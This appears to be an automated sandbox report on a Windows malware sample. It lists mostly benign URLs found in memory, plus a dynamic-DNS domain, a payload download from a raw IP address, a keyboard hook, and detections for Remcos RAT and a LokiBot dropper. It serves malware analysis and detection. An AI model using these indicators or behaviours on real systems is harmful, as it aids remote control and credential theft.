          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/248/152/169/520bb037-5f8d-42d6-934b-d6ec4a6832e8.jpg?v=9
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://cvision.media.net/new/300x300/3/237/70/222/47ef75a1-aa03-4dce-a349-91d6a5ed47bb.jpg?v=9
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9B620FEE
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWeTGO?ver=8c74&q=90&m=
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: g4FtSOZMD9.exeString found in binary or memory: https://login.yahoo.com/config/login
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://logincdn.msauth.net/16.000.28230.00/MeControl.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://pki.goog/repository/0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msn
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=1824632442.1601478955
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/
          Source: g4FtSOZMD9.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
          Source: g4FtSOZMD9.exe, 00000015.00000003.616430526.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616818269.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616919140.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616667092.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616571537.0000000002283000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000015.00000003.616756654.0000000002283000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
          Source: bhvFAB7.tmp.21.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhvFAB7.tmp.21.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: unknown | DNS traffic detected: queries for: nhtaxfilling.ddnsgeek.com
Source: global traffic | HTTP traffic detected: GET /1040_RyQoPlW98.bin HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, Host: 147.189.137.168, Cache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\g4FtSOZMD9.exe
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: g4FtSOZMD9.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02296E2A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02285E30
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02285A4E
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228D09B
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02283939
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228DDDD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228CE2E
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02282E19
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02282E67
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02295252
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02285B30
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02285B36
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228A760
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02281772
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02293C6F
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02281844
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_022828ED
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_022818CB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02280947
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228395F
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_00081B0A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_0008510A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_00081407
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_00086D17
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 9_3_00087D45
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044B040
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044B870
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044081D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0043610D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044AA80
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_00447310
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044BBD8
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044A490
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0043C560
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_00446D30
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_00446D8B
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044B610
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_0044D6C0
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 21_1_004476F0
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_004050C2
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_004014AB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00405133
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_004051A4
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00401246
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_0040CA46
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00405235
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_004032C8
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_004222D9
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00401689
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00402F60
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_1_004222D9
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_0040D044
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00405038
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004050A9
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_0040511A
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004051AB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004382F3
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00430575
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_0043B671
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_0041F6CD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004119CF
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00439B11
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00438E54
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_00412F67
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_0043CF18
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_004382F3
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_00430575
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_0043B671
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_0041F6CD
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_00439B11
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_00438E54
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_1_0043CF18
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 004124F0 appears 33 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 00412627 appears 61 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 00412968 appears 153 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 00421A32 appears 71 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 00416760 appears 65 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: String function: 0044407A appears 37 times
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228DACD NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_02296762 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228D09B NtWriteVirtualMemory,CreateFileA,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 0_2_0228DDDD NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00402CAC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 22_2_00402D66 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004016FC NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Code function: 23_2_004017B6 NtdllDefWindowProc_A,
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe | Process Stats: CPU usage > 98%
Source: g4FtSOZMD9.exe, 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000000.00000002.470911055.00000000020E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameIndregnet8.exeFE2XCfarS vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000000.460170430.0000000000431000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.604551488.0000000020A41000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.582574015.0000000001C68000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameIndregnet8.exe vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.605978483.0000000001C8C000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
Source: g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs g4FtSOZMD9.exe
